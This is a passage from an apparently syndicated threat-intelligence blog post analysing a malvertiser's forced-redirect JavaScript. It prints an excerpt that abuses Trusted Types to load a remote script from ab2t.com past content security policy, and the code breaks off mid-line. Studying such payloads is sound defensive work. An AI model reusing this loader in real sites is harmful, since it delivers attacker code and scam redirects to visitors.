MutantBedrog is a malvertiser that caught our attention early summer ’04 for their highly disruptive forced redirect campaigns and the unique JavaScript payload that they use to fingerprint devices and dispatch invasive redirections.
While a comprehensive report on MutantBedrog’s TTPs is available here, this blog post will hyper-focus on a very specific technical tidbit from their client-side redirect payload.
For reference, the full payload is available in the following gist:
https://medium.com/media/cdb8efa30aee218927ef5d593cdf21ac/href
This code includes a lot of familiar tactics, but tldr: it’s a slightly convoluted mess of multi-stage client-side fingerprinting and DOM manipulation that exists purely to spawn a hopefully unmitigated redirect to a scam landing page.
One of the things that stood out to us right away were the multiple references to content security policies and Trusted-Types that appear at every stage of execution.
Let’s zoom in on some excerpts for clarity:
if (!j && typeof trustedTypes !== 'undefined') {
try {
var y =
'\net = () => {\n var t = Math.round(Date.now() / 1000).toString();\n var es = "";\n for (var i = 0; i < t.length; i++) {\n var c = t.charCodeAt(i);\n es += String.fromCharCode(c + 10);\n }\n return encodeURIComponent(btoa(es));\n};\ntry {\nif (typeof trustedTypes !== "undefined") {\nconst rp = trustedTypes.createPolicy("rp", {\ncreateScriptURL: (input) => input,\n});\nvar script = document.createElement("script");\nscript.src = rp.createScriptURL(\n"https://ab2t.com/v2/banner/pix?id=5d83bs12&aid=ttd006&tid=' +
(window['_tk'] || 0) +
'&p="+et()\n);\nscript.type = "text/javascript";\nscript.onload = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\nscript.onerror = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\ndocument.head.appendChild(sc
[...]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from Confiant - Medium
Read the original article: